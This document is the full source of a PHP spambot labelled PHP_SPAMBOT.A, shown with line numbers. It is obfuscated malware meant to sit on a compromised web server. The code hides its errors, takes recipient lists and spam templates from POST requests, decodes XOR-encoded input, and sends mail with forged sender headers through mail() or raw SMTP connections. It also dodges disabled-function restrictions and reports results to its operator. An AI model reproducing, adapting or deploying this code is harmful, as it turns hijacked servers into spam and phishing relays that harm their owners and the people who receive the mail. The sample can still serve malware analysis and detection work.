PHP_SPAMBOT.A

1. <?php
2. @error_reporting(0);
3. @ini_set('error_log', NULL);
4. @ini_set('log_errors', 0);
5. if (count($_POST) < 2) {
6.     die(PHP_OS . chr(49) . chr(48) . chr(43) . md5(0987654321));
7. }
8. $v5031e998 = false;
9. foreach (array_keys($_POST) as $v3c6e0b8a) {
10.     switch ($v3c6e0b8a[0]) {
11.         case chr(108):
12.             $vd56b6998 = $v3c6e0b8a;
13.             break;
14.         case chr(100):
15.             $v8d777f38 = $v3c6e0b8a;
16.             break;
17.         case chr(109):
18.             $v3d26b0b1 = $v3c6e0b8a;
19.             break;
20.         case chr(101);
21.             $v5031e998 = true;
22.             break;
23.     }
24. }
25. if ($vd56b6998 === '' || $v8d777f38 === '')
26.     die(PHP_OS . chr(49) . chr(49) . chr(43) . md5(0987654321));
27. $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
28. $v01b6e203 = @$_POST[$vd56b6998];
29. $v8d777f38 = @$_POST[$v8d777f38];
30. $v3d26b0b1 = @$_POST[$v3d26b0b1];
31. if ($v5031e998) {
32.     $v01b6e203 = n9a2d8ce3($v01b6e203);
33.     $v8d777f38 = n9a2d8ce3($v8d777f38);
34.     $v3d26b0b1 = n9a2d8ce3($v3d26b0b1);
35. }
36. $v01b6e203 = urldecode(stripslashes($v01b6e203));
37. $v8d777f38 = urldecode(stripslashes($v8d777f38));
38. $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1));
39. if (strpos($v01b6e203, '#', 1) != false) {
40.     $v16a9b63f = preg_split('/#/', $v01b6e203);
41.     $ve2942a04 = count($v16a9b63f);
42. } else {
43.     $v16a9b63f[0] = $v01b6e203;
44.     $ve2942a04    = 1;
45. }
46. for ($v865c0c0b = 0; $v865c0c0b < $ve2942a04; $v865c0c0b++) {
47.     $v01b6e203 = $v16a9b63f[$v865c0c0b];
48.     if ($v01b6e203 == '' || !strpos($v01b6e203, '@', 1))
49.         continue;
50.     if (strpos($v01b6e203, ';', 1) != false) {
51.         list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/', strtolower($v01b6e203));
52.         $va3da707b = ucfirst($va3da707b);
53.         $vbfbb12dc = ucfirst($vbfbb12dc);
54.         $v3a5939e4 = next(explode('@', $v081bde0c));
55.         if ($vbfbb12dc == '' || $va3da707b == '') {
56.             $vbfbb12dc = $va3da707b = '';
57.             $v01b6e203 = $v081bde0c;
58.         } else {
59.             $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>";
60.         }
61.     } else {
62.         $vbfbb12dc = $va3da707b = '';
63.         $v081bde0c = strtolower($v01b6e203);
64.         $v3a5939e4 = next(explode('@', $v01b6e203));
65.     }
66.     preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1);
67.     $vee11cbb1 = $vee11cbb1[1];
68.     preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c);
69.     $vb068931c = $vb068931c[1];
70.     preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9);
71.     $vc34487c9 = $vc34487c9[1];
72.     preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42);
73.     $v6f4b5f42 = $v6f4b5f42[1];
74.     $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9);
75.     $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9);
76.     $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42);
77.     $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42);
78.     $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);
79.     if (ne667da76($v0897acf4) || @ini_get('safe_mode'))
80.         $v10497e3f = false;
81.     else
82.         $v10497e3f = true;
83.     $v9a5cb5d8 = "$vee11cbb1@$v0897acf4";
84.     if ($vb068931c != '')
85.         $vd98a07f8 = "$vb068931c <$v9a5cb5d8>";
86.     else
87.         $vd98a07f8 = $v9a5cb5d8;
88.     $vb8ddc93f = "From: $vd98a07f8\r\n";
89.     $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n";
90.     $v3c87b187 = "X-Priority: 3 (Normal)\r\n";
91.     $v3c87b187 .= "MIME-Version: 1.0\r\n";
92.     $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n";
93.     $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n";
94.     if (!in_array('mail', $v619d75f8)) {
95.         if ($v10497e3f) {
96.             if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f . $v3c87b187, "-f$v9a5cb5d8")) {
97.                 echo (chr(79) . chr(75) . md5(1234567890) . "+0\n");
98.                 continue;
99.             }
100.         } else {
101.             if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) {
102.                 echo (chr(79) . chr(75) . md5(1234567890) . "+0\n");
103.                 continue;
104.             }
105.         }
106.     }
107.     $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O") . "\r\n" . $vb8ddc93f;
108.     $v4340fd73 .= "Message-ID: <" . preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time())) . "@$v0897acf4>\r\n";
109.     $v4340fd73 .= "To: $v01b6e203\r\n";
110.     $v4340fd73 .= "Subject: $vc34487c9\r\n";
111.     $v4340fd73 .= $v3c87b187;
112.     $v841a2d68 = $v4340fd73 . "\r\n" . $v6f4b5f42;
113.     if ($v3d26b0b1 == '')
114.         $v3d26b0b1 = n9c812bad($v3a5939e4);
115.     if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) {
116.         echo (chr(79) . chr(75) . md5(1234567890) . "+1\n");
117.         continue;
118.     } else {
119.         echo PHP_OS . chr(50) . chr(48) . '+' . md5(0987654321) . "+$vb4a88417\n";
120.     }
121. }
122. function ne667da76($v957b527b)
123. {
124.     return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b);
125. }
126. function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685 = "=\r\n", $v92f21a0f = 0, $v3303c65a = false)
127. {
128.     $vf5a8e923 = strlen($vb45cffe0);
129.     $vb4a88417 = '';
130.     for ($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) {
131.         if ($v11a95b8a >= 75) {
132.             $v11a95b8a = $v92f21a0f;
133.             $vb4a88417 .= $v7fa1b685;
134.         }
135.         $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]);
136.         if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) {
137.             if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) {
138.                 $vb4a88417 .= chr($v4a8a08f0);
139.                 $v11a95b8a = 0;
140.                 continue;
141.             }
142.             $vb4a88417 .= '=' . str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
143.             $v11a95b8a += 3;
144.             continue;
145.         }
146.         $vb4a88417 .= chr($v4a8a08f0);
147.         $v11a95b8a++;
148.     }
149.     return $vb4a88417;
150. }
151. function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1)
152. {
153.     global $v619d75f8;
154.     if (!in_array('fsockopen', $v619d75f8))
155.         $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
156.     elseif (!in_array('pfsockopen', $v619d75f8))
157.         $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
158.     elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client"))
159.         $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20);
160.     else
161.         return -1;
162.     if (!$v66b18866) {
163.         return 1;
164.     } else {
165.         $v8d777f38 = n54070395($v66b18866);
166.         @fputs($v66b18866, "EHLO $v0897acf4\r\n");
167.         $ve98d2f00 = n54070395($v66b18866);
168.         if (substr($ve98d2f00, 0, 3) != 250)
169.             return "2+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
170.         @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n");
171.         $ve98d2f00 = n54070395($v66b18866);
172.         if (substr($ve98d2f00, 0, 3) != 250)
173.             return "3+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
174.         @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n");
175.         $ve98d2f00 = n54070395($v66b18866);
176.         if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251)
177.             return "4+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
178.         @fputs($v66b18866, "DATA\r\n");
179.         $ve98d2f00 = n54070395($v66b18866);
180.         if (substr($ve98d2f00, 0, 3) != 354)
181.             return "5+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
182.         @fputs($v66b18866, $v841a2d68 . "\r\n.\r\n");
183.         $ve98d2f00 = n54070395($v66b18866);
184.         if (substr($ve98d2f00, 0, 3) != 250)
185.             return "6+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
186.         @fputs($v66b18866, "QUIT\r\n");
187.         @fclose($v66b18866);
188.         return 0;
189.     }
190. }
191. function n54070395($v66b18866)
192. {
193.     $v8d777f38 = '';
194.     while ($v341be97d = @fgets($v66b18866, 4096)) {
195.         $v8d777f38 .= $v341be97d;
196.         if (substr($v341be97d, 3, 1) == ' ')
197.             break;
198.     }
199.     return $v8d777f38;
200. }
201. function n9c812bad($vad5f82e8)
202. {
203.     global $v619d75f8;
204.     if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) {
205.         @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816);
206.         if (count($v744fa43b) === 0)
207.             return '127.0.0.1';
208.         $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816));
209.         return $v744fa43b[$v865c0c0b[0]];
210.     } else {
211.         return '127.0.0.1';
212.     }
213. }
214. function n9a2d8ce3($v1cb251ec)
215. {
216.     $v1cb251ec = base64_decode($v1cb251ec);
217.     $vc68271a6 = '';
218.     for ($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++)
219.         $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2);
220.     return $vc68271a6;
221. }
222. ?>